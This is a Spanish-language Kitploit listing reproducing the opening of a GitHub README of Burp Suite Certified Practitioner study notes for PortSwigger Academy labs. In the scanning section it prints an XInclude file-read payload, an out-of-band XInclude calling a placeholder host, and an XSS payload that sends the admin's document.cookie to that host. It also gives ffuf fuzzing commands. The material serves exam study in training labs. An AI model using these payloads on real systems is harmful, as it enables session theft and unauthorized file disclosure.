Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Burp-Suite-Certified-Practitioner-Exam-Study — Notas de estudio prácticas y guías paso a paso para los laboratorios de PortSwigger Academy, que cubren vulnerabilidades web, payloads, enumeración y estrategias para el examen BSCP. | Kitploit
Herramientas/GitHub
GitHub
/botesjuan
/burp-suite-certified-practitioner-exam-study
Análisis de VulnerabilidadesExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónRecursos CuradosDesarrollo de PayloadsRutas de Aprendizaje y CursosLabs y PrácticaTop en Rutas de Aprendizaje y Cursos #9
GitHubbotesjuan/burp-suite-certified-practitioner-exam-study

Burp-Suite-Certified-Practitioner-Exam-Study

Notas de estudio prácticas y guías paso a paso para los laboratorios de PortSwigger Academy, que cubren vulnerabilidades web, payloads, enumeración y estrategias para el examen BSCP.

Ver Repositorio
1.5k385173hace 1 mesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Estudio para el examen Burp Suite Certified Practitioner

Estas son mis notas de estudio con más de 110 laboratorios de PortSwigger Academy. Usé estos laboratorios para aprobar el examen de Burp Suite Certified Practitioner en 2023. Mi certificación BSCP.
Para más información visita PortSwigger Academy para obtener los materiales de aprendizaje más recientes.


ESCANEO - Enumeración
Escaneo enfocado
Escaneo de entidades no estándar

PUNTO DE APOYO - Etapa 1
Descubrimiento de contenido
DOM-XSS
XSS Cross Site Scripting
Envenenamiento de caché web
Cabeceras de host
Contrabando de peticiones HTTP
Fuerza bruta
Autenticación

ESCALADA DE PRIVILEGIOS - Etapa 2
CSRF - Toma de control de cuenta
Restablecimiento de contraseña
SQLi - Inyección SQL
JWT - JSON Web Tokens
Contaminación de prototipos
Pruebas de API
Control de acceso
Endpoints de API GraphQL
CORS - Intercambio de recursos de origen cruzado

EXFILTRACIÓN DE DATOS - Etapa 3
XXE - Entidades XML e inyecciones
SSRF - Falsificación de peticiones del lado del servidor
SSTI - Inyección de plantillas del lado del servidor
SSPP - Contaminación de prototipos del lado del servidor
LFI - Recorrido de rutas de archivos
Subida de archivos
Deserialización
Inyección de comandos del sistema operativo

APÉNDICE
Scripts de Python
Payloads
Listas de palabras
Escaneo enfocado del objetivo
Enfoque
Contenido de entrenamiento adicional

Mis consejos de Burp

Recomiendo hacer el Mystery lab challenge tantas veces como sea posible para poner a prueba tus habilidades y reducir el tiempo que te lleva identificar las vulnerabilidades, antes de hacer el examen.
También me resultó muy informativo este consejo de PortSwigger sobre Repetir tu examen.
Mira CryptoCat - Burp Suite Certified Professional (BSCP) Review + Tips/Tricks para una visión actualizada del examen BSCP en 2024.




Buy Me A Coffee

Gracias por el café de apoyo, \o/

Mi certificado de Burp Suite Certified Practitioner.


Escaneo

La enumeración de las aplicaciones web comienza con un escaneo inicial y dirigido en un compromiso con tiempo limitado.

Escaneo enfocado
Escaneo de entidades no estándar

Escaneo enfocado

Debido al estricto límite de tiempo durante los compromisos o el examen, escanea puntos de inserción definidos para peticiones específicas.

scan-defined-insertion-points

El escáner detectó una vulnerabilidad de inyección XML en el parámetro storeId y esto permitió leer el archivo secreto de Carlos.```xml <xi:include parse="text" href="file:///home/carlos/secret"/>

>Solicitud XInclude fuera de banda, se necesita un DTD alojado para leer el archivo local.```xml
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

PortSwigger Lab: Discovering vulnerabilities quickly with targeted scanning

Escaneo de estructuras de datos no estándar

Escaneo de estructuras de datos no estándar utilizando la función de Burp para escanear el punto de inserción seleccionado para texto seleccionado en respuestas o solicitudes.

scan-selected-insertion-point

Identifica la vulnerabilidad a través de los resultados de problemas del escáner de Burp.
En este caso, utilizando el XSS identificado, roba las cookies del usuario administrador elaborando el payload en el punto de inserción identificado.``` '"><svg/onload=fetch(//OASTIFY.COM/${encodeURIComponent(document.cookie)})>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

>Codifica por URL los caracteres clave.  

![admin-cookie-stealer](https://assets.kitploit.com/production/public/readmes/51008/64ba64b0fa7e1681859eb5d76a88f94fb91a78655f1ce768ff8e1b50f3cf57c1/990ac058ff6a9727193848c821acf60a43011fa7ba8dfd967ab6b3dd7f2e0bcb-display-v1.webp)  

>Usa la cookie del usuario administrador para acceder al panel de administración reemplazándola en la sesión actual del navegador.  

[PortSwigger Lab: Escaneo de estructuras de datos no estándar](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures)  
    
-----

# Acceso inicial  
  
# Descubrimiento de contenido  

>La enumeración del objetivo comienza con el fuzzing de directorios y archivos web. Usa las herramientas de engagement de Burp, la opción de descubrimiento de contenido para encontrar rutas y archivos ocultos, o usa `FFUF` para enumerar directorios y archivos web. Revisar `robots.txt` o `sitemap.xml` puede revelar contenido.```bash
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

Herramienta de engagement de Burp, descubrimiento de contenido usando mi lista de palabras compilada burp-labs-wordlist como lista de archivos personalizada.

Descargar herramienta